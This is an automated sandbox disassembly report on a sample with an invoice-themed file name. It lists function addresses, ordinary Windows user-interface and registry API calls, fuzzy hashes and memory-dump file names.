Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$Rect$Client
String ID:
API String ID: 4194289498-0
Opcode ID: fb29f5bf37b2691f8ffac580ca11bd87ec9ec5294197c120b1f040d7f949c514
Instruction ID: 8e3247d3237e1c33805e2041288525f262c1390343fa65d415f7b089a6d469c2
Opcode Fuzzy Hash: fb29f5bf37b2691f8ffac580ca11bd87ec9ec5294197c120b1f040d7f949c514
Instruction Fuzzy Hash: 99516D35A0061AEFDB05DF68D8489EEBBF5FF48750F044269E919E7260DB70AA50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C0906D, Relevance: 9.1, APIs: 6, Instructions: 145windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C090F2
IsWindow.USER32(?), ref: 00C0916D
ClientToScreen.USER32(?,?), ref: 00C0917E
IsWindow.USER32(?), ref: 00C0919C
ClientToScreen.USER32(?,?), ref: 00C091CC
SendMessageA.USER32(?,0000020A,?,?), ref: 00C0922A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClientMessageScreenSendWindow
String ID:
API String ID: 2093367132-0
Opcode ID: 52ae4168fb76d20568a6ce7871b10e9a19a60264fa4c0fb8e46f50843b08ed7d
Instruction ID: 73ab8f8addd8af0907ea8e2d4f97c4b7e17fd09c39e538f7f28d26e951e6657c
Opcode Fuzzy Hash: 52ae4168fb76d20568a6ce7871b10e9a19a60264fa4c0fb8e46f50843b08ed7d
Instruction Fuzzy Hash: 6841E335614602BADF295FB8CD4CB7E7AA5EB08300F008528E5A2C26E2D632DF40E610

Uniqueness

Uniqueness Score: -1.00%

Function 00BEEC59, Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BEEC60

Part of subcall function 00BB274F: __EH_prolog3.LIBCMT ref: 00BB2756
Part of subcall function 00BB274F: GetWindowDC.USER32(00000000,00000004,00C01693,00000000), ref: 00BB2782

GetWindowRect.USER32 ref: 00BEEC9C
GetClientRect.USER32 ref: 00BEECD7

Part of subcall function 00BB39EE: ClientToScreen.USER32(?,?), ref: 00BB39FD
Part of subcall function 00BB39EE: ClientToScreen.USER32(?,?), ref: 00BB3A0A

OffsetRect.USER32(?,?,00000000), ref: 00BEECF7
OffsetRect.USER32(?,?,?), ref: 00BEED2D
CreateRectRgnIndirect.GDI32(?), ref: 00BEED46

Part of subcall function 00BB4456: SelectClipRgn.GDI32(000000FF,00000000), ref: 00BB4476
Part of subcall function 00BB4456: SelectClipRgn.GDI32(000000FF,00000000), ref: 00BB448C

Part of subcall function 00BB43B8: ScreenToClient.USER32 ref: 00BB43C7
Part of subcall function 00BB43B8: ScreenToClient.USER32 ref: 00BB43D4

Part of subcall function 00BB28BE: ReleaseDC.USER32 ref: 00BB28F2

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClientRect$Screen$ClipOffsetSelectWindow$CreateH_prolog3H_prolog3_IndirectRelease
String ID:
API String ID: 2381714760-0
Opcode ID: 701b04582cdaf030c9c8ca0be446c2e87d7e725dbd04288cb43973c18bd3b560
Instruction ID: a28d6f89f8c5035f9c76ca7ae9e094bf4e2c552b4827e3c731b25d9f08b7369b
Opcode Fuzzy Hash: 701b04582cdaf030c9c8ca0be446c2e87d7e725dbd04288cb43973c18bd3b560
Instruction Fuzzy Hash: 9A41E471900619DFCF11DFA8C885AEEBBF9FF09300F044159E816AB251DBB56A06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BF6259, Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00BF62A6
MapWindowPoints.USER32 ref: 00BF62C9
PtInRect.USER32(?,?,?), ref: 00BF62D9
MapWindowPoints.USER32 ref: 00BF6300
SendMessageA.USER32(?,?,00000000,?), ref: 00BF6374

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: PointsRectWindow$ClientMessageSend
String ID:
API String ID: 3885650166-0
Opcode ID: aebc7f929861bbc1339d040aa8dbce0e669ad94a00fa500c15421e73c52f40bb
Instruction ID: c0c8d79f98f9ba3832931953860b90412d53f71219159d91ba7a6ff768443dc6
Opcode Fuzzy Hash: aebc7f929861bbc1339d040aa8dbce0e669ad94a00fa500c15421e73c52f40bb
Instruction Fuzzy Hash: 4641F9B1A00209EFEB54CFA9C890EBA7BF9FB48300F10456DFA56DB250D7709914DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BF4875, Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BF48CB
SendMessageA.USER32(?,00001204,00000000,00000002), ref: 00BF48F8
_strlen.LIBCMT ref: 00BF4905
SendMessageA.USER32(?,00001204,00000001,00000002), ref: 00BF492D
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00BF4953
_strlen.LIBCMT ref: 00BF4992

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _strlen$MessageSend$RedrawWindow
String ID:
API String ID: 3920548903-0
Opcode ID: 3c63f29bbddd58815a321e3c99068b2cd6e3e72d558ee104bec2a23c75ec8303
Instruction ID: 852d5c070ee86ffd0bc1246eeaf46cc8ca362876369890aa2301a2a3827038ad
Opcode Fuzzy Hash: 3c63f29bbddd58815a321e3c99068b2cd6e3e72d558ee104bec2a23c75ec8303
Instruction Fuzzy Hash: AA313D35600318EFDB04AF68DC85BEE7BA9FF48760F044169F909A7391DB74A941CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C005B8, Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C005BF
CreateRectRgnIndirect.GDI32(00000000), ref: 00C005DF

Part of subcall function 00BB4456: SelectClipRgn.GDI32(000000FF,00000000), ref: 00BB4476
Part of subcall function 00BB4456: SelectClipRgn.GDI32(000000FF,00000000), ref: 00BB448C

GetParent.USER32(?), ref: 00C005FF
DrawThemeParentBackground.UXTHEME(?,00000000,00000000,00000000,?,?,00000018,00BEB778,?,?,?), ref: 00C00620
MapWindowPoints.USER32 ref: 00C00654
SendMessageA.USER32(?,00000014,00000000,00000000), ref: 00C00680

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClipParentSelect$BackgroundCreateDrawH_prolog3IndirectMessagePointsRectSendThemeWindow
String ID:
API String ID: 935984306-0
Opcode ID: 4aa2519997f00284f16e591c4de0dce52df2cc9266bde8fb05c4a19b305f6939
Instruction ID: 3975d82925b2057bc4d2ad7d1ecf732d46dca2f2dcfa91e41e35c6c9d89610db
Opcode Fuzzy Hash: 4aa2519997f00284f16e591c4de0dce52df2cc9266bde8fb05c4a19b305f6939
Instruction Fuzzy Hash: 16313A71A0020AEFDF00DFA4C849BEE7BB5FF08301F114558FA15AB2A1DBB59A14DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0E03, Relevance: 9.1, APIs: 6, Instructions: 76COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32 ref: 00BB0E3E
GetParent.USER32(4B5C1563), ref: 00BB0E4C
GetParent.USER32(4B5C1563), ref: 00BB0E63
GetLastActivePopup.USER32(4B5C1563), ref: 00BB0E7D
IsWindowEnabled.USER32(4B5C1563), ref: 00BB0E91
EnableWindow.USER32(4B5C1563,00000000), ref: 00BB0EA4

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 3872d00896d02464afb88a98fd0e4162c24eba8c240a06b6cdc2fa82c2af86f9
Instruction ID: 8864995bda286e1ef9707d02802183dd4c52b69444d64bc31fae7c0c6fa4f633
Opcode Fuzzy Hash: 3872d00896d02464afb88a98fd0e4162c24eba8c240a06b6cdc2fa82c2af86f9
Instruction Fuzzy Hash: 9111A572E11321DBDB313B699884BFB76E8EF54B50B050A95EC01E7350DBE0DC0196A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BF00FE, Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF0105

Part of subcall function 00BBEB10: IsWindowEnabled.USER32(?), ref: 00BBEB1B

InvalidateRect.USER32(?,00000000,00000001,0000000C), ref: 00BF0131
UpdateWindow.USER32(?), ref: 00BF013A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$EnabledH_prolog3InvalidateRectUpdate
String ID:
API String ID: 262192325-0
Opcode ID: 2e652fd21715d28238f81173f2de3d5e41b84e7b055de97713462c33488303f4
Instruction ID: 6b7bf4fe8a45d4861319395a30cc01f8315dda8459439f20db9706e51e621d9c
Opcode Fuzzy Hash: 2e652fd21715d28238f81173f2de3d5e41b84e7b055de97713462c33488303f4
Instruction Fuzzy Hash: A0215C71910308DBDB21EBA5C999EAFBBF9FF85300B0045ADF156A7262DB349904CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8F2B, Relevance: 9.1, APIs: 6, Instructions: 74windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BA8F32

Part of subcall function 00BACDD4: SendMessageA.USER32(?,0000018A,?,00000000), ref: 00BACDE7
Part of subcall function 00BACDD4: SendMessageA.USER32(?,00000189,?,00000000), ref: 00BACE02

SendMessageA.USER32(?,00000199,?,00000000), ref: 00BA8FB3
SendMessageA.USER32(?,00000182,?,00000000), ref: 00BA8FCA
SendMessageA.USER32(?,00000181,00000000,?), ref: 00BA8FE4
SendMessageA.USER32(?,0000019A,00000000,?), ref: 00BA8FF8
SendMessageA.USER32(?,00000186,00000000,00000000), ref: 00BA9009

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$H_prolog3
String ID:
API String ID: 1885053084-0
Opcode ID: f61daab322e5c01a40cf5cb718a91d62a1fae7568040127c038191d527d3d913
Instruction ID: 60ab15ddf75036c1dcc8f71f3347666207cdffd5bb81393cc5a0b923030c01d5
Opcode Fuzzy Hash: f61daab322e5c01a40cf5cb718a91d62a1fae7568040127c038191d527d3d913
Instruction Fuzzy Hash: 59216B32600216EBDF219F58CC45EEEBBB2FB49320F104265F914A72E0DB715911DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0082, Relevance: 9.1, APIs: 6, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyA.ADVAPI32(00000000,?), ref: 00BB00A6
RegDeleteValueA.ADVAPI32(00000000,?,?,00000000), ref: 00BB00C6
RegCloseKey.ADVAPI32(00000000), ref: 00BB00F1

Part of subcall function 00BAF823: RegCloseKey.ADVAPI32(00000000), ref: 00BAF8C8
Part of subcall function 00BAF823: RegCloseKey.ADVAPI32(00000000), ref: 00BAF8D7

_strlen.LIBCMT ref: 00BB00D9
RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000001,?,00000000), ref: 00BB00E8
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00BB010C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Close$DeleteValue$PrivateProfileStringWrite_strlen
String ID:
API String ID: 498930969-0
Opcode ID: 288937bb302b456efda9569683d71a28d15698c6e10d400dbc7b61afe8c39dd4
Instruction ID: 4c4585a5994961221ec5b1d6f8f7091397f46eeaeacf727ad34a302c72c34b91
Opcode Fuzzy Hash: 288937bb302b456efda9569683d71a28d15698c6e10d400dbc7b61afe8c39dd4
Instruction Fuzzy Hash: EB11C232411259FB8B323B648C44EFB3BADEF457A0B514164FE05EA212DAB1CC1197B0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8C4F, Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 00BC8C53

Part of subcall function 00BC9047: GetWindowLongA.USER32 ref: 00BC9062
Part of subcall function 00BC9047: GetClassNameA.USER32(?,?,0000000A), ref: 00BC9077
Part of subcall function 00BC9047: CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 00BC908E

GetParent.USER32(00000000), ref: 00BC8C74
GetWindowLongA.USER32 ref: 00BC8C93
GetParent.USER32(?), ref: 00BC8CA1
GetDesktopWindow.USER32 ref: 00BC8CA9
SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 00BC8CBD

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
String ID:
API String ID: 1233893325-0
Opcode ID: f65a45d01487dc7262a40a842e5852738abd3bc803ef402b3960b5b9780426f6
Instruction ID: 174bd643fe281f5ebf71b269739215bcdf02a4b5f365d278370a4ee641b2e1d3
Opcode Fuzzy Hash: f65a45d01487dc7262a40a842e5852738abd3bc803ef402b3960b5b9780426f6
Instruction Fuzzy Hash: 3CF01231143620A7E6222734BD49FFF76E8DB81F51F090259F921E73909F28994545B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA3FC, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 215windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC2B6D: __EH_prolog3.LIBCMT ref: 00BC2B74

SendMessageA.USER32(?,00000405,00000000,?), ref: 00BBA5D4
GetWindowLongA.USER32 ref: 00BBA5DF
GetWindowLongA.USER32 ref: 00BBA5F3
SetWindowLongA.USER32 ref: 00BBA61C

Strings

,, xrefs: 00BBA5BC

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: LongWindow$H_prolog3MessageSend
String ID: ,
API String ID: 4140968126-3772416878
Opcode ID: aff12b6af46cf43911ddc5c152f593a286d9ad3d1b6dbc7176f2dd59b171497d
Instruction ID: b91d811849153c3fdefccbc841d9c700f865382e4021ba33c06013f4b76ec683
Opcode Fuzzy Hash: aff12b6af46cf43911ddc5c152f593a286d9ad3d1b6dbc7176f2dd59b171497d
Instruction Fuzzy Hash: 79716F31A00615EFDB15AF68D895ABEBBE9FF54710B0401A9E90697391DFB0ED00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BFA3BE, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BFA3C5
SendMessageA.USER32(?,00000102,?,00000000), ref: 00BFA40B
GetCapture.USER32 ref: 00BFA60B
ReleaseCapture.USER32 ref: 00BFA615

Strings

, xrefs: 00BFA447

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Capture$H_prolog3MessageReleaseSend
String ID:
API String ID: 1254700485-3916222277
Opcode ID: 1f3a1635d5c7f2eeff072472819cd05548fddabc0a89333ba79ee7e8c6e117db
Instruction ID: 38bd0d23eca1203626d027d8a370a1d84a768a8896a8048a1ad67cc4f7c63d0e
Opcode Fuzzy Hash: 1f3a1635d5c7f2eeff072472819cd05548fddabc0a89333ba79ee7e8c6e117db
Instruction Fuzzy Hash: 3371E57190024ADFCF19DB68C9999FDBBF0FF15310F144299E219A3691DB70AE48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00BFC4AB, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 172windowmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BFC4B5
GlobalAlloc.KERNEL32(00000040,0000000C), ref: 00BFC543
SendMessageA.USER32 ref: 00BFC659
SendMessageA.USER32(?,0000110A,00000004,?), ref: 00BFC6CA

Strings

g, xrefs: 00BFC52A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$AllocGlobalH_prolog3
String ID: g
API String ID: 3246992648-30677878
Opcode ID: 022423203779ca58c42987d6edf696993efb656d38906ad30ec66ad47efbd3e3
Instruction ID: 2301fdfad27b6cd933ef3b7f0d64960c9c9775ec51330d7c625a1ca4c83682ad
Opcode Fuzzy Hash: 022423203779ca58c42987d6edf696993efb656d38906ad30ec66ad47efbd3e3
Instruction Fuzzy Hash: E9611571A00219EFDF04DFA4CC85BEEBBB5BF48710F144159EA05AB2A0DB71A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BDEFEE, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BDEFF8
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,00000000,?,00000001,?,?,?,?,?,?), ref: 00BDF167

Part of subcall function 00BC3C7B: __EH_prolog3.LIBCMT ref: 00BC3C82

_strlen.LIBCMT ref: 00BDF09B
_strlen.LIBCMT ref: 00BDF12C

Strings

CLSID, xrefs: 00BDF054

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _strlen$CloseH_prolog3H_prolog3_
String ID: CLSID
API String ID: 3240699384-910414637
Opcode ID: 77dbff4d859185284b5321357e995592c1431b71553265058f90752677e9dcb6
Instruction ID: e975f38194a1ad2ac6fe321b6442c8a9106b94dd1364d1c490f086161b33ed25
Opcode Fuzzy Hash: 77dbff4d859185284b5321357e995592c1431b71553265058f90752677e9dcb6
Instruction Fuzzy Hash: 8B416D7190421E9BDF25DF64CC86BF9B3F8EB08314F0041EAE91A63241EB745E84CE61

Uniqueness

Uniqueness Score: -1.00%

Function 00BF6A02, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BF6A0C

Part of subcall function 00C4BF11: __EH_prolog3.LIBCMT ref: 00C4BF18

FillRect.USER32 ref: 00BF6A65

Part of subcall function 00BA39F5: __EH_prolog3.LIBCMT ref: 00BA39FC
Part of subcall function 00BA39F5: _strlen.LIBCMT ref: 00BA3A37

Part of subcall function 00BD8CDD: __EH_prolog3.LIBCMT ref: 00BD8CE4

InflateRect.USER32(?,000000FE,000000FE), ref: 00BF6B65
DrawFocusRect.USER32 ref: 00BF6B78

Strings

..., xrefs: 00BF6ABE

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
